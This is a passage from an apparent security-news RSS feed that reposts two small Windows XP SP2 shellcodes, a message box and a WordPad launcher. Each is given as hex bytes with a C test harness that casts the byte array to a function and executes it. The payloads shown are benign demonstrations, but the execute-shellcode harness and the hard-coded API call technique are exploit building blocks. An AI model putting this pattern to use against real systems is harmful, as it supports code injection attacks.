    push ecx              ; lpMessageText
    push eax              ; uAction = 0
    call ebx              ; app does a clean exit

-------------------
Shellcodetest.c
-------------------
<![CDATA[
char code[] =
    "\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"
    "\xD8\x0A\x86\x7C\x51\x50\xFF\xD3";

int main(int argc, char *argv[])
{
    int (*func)(void);
    func = (int (*)(void))code;
    (*func)();
    return 0;
}
]]>
----------------------
Greetz Fly Out To
----------------------
1. Amforked: my mentor
2. The Blue Genius: my boss
3. www.orchidseven.com</description><link>http://www.secuobs.com/revue/news/160149.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/160149.shtml</guid></item>
<item><title>Windows XP Pro Sp2 English "Wordpad" Shellcode</title><description>Secuobs.com : 2009-11-06 17:28:35 -  Aodrulez  - Size: 12 bytes
Author: Aodrulez
Email: f3arm3d3ar@gmail.com
Milw0rm: www.milw0rm.com/author/1620
Shellcode:
  \x68\x97\x4C\x80\x7C\xB8
  \x4D\x11\x86\x7C\xFF\xD0
(That is push 7C804C97h / mov eax, 7C86114Dh / call eax; as with the Message-Box shellcode, the absolute addresses are specific to the English XP SP2 DLL build.)

-------------------
Shellcodetest.c
-------------------
<![CDATA[
char code[] =
    "\x68\x97\x4C\x80\x7C\xB8"
    "\x4D\x11\x86\x7C\xFF\xD0";

int main(int argc, char *argv[])
{
    int (*func)(void);
    func = (int (*)(void))code;
    (*func)();
    return 0;
}
]]>
----------------------
Greetz Fly Out To
----------------------
1. Amforked: my mentor
2. The Blue Genius: my boss
3. Todd (Packetstormsecurity.org staff): Tnx a ton, fellas
4. www.orchidseven.com
5. www.isacm.org.in

---------------
References
---------------
1. http://packetstormsecurity.org/filedesc/wordpad-shellcode.txt.html
2. http://www.shell-storm.org/shellcode/files/shellcode-513.php</description><link>http://www.secuobs.com/revue/news/158245.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/158245.shtml</guid></item>
</channel>
</rss>
 
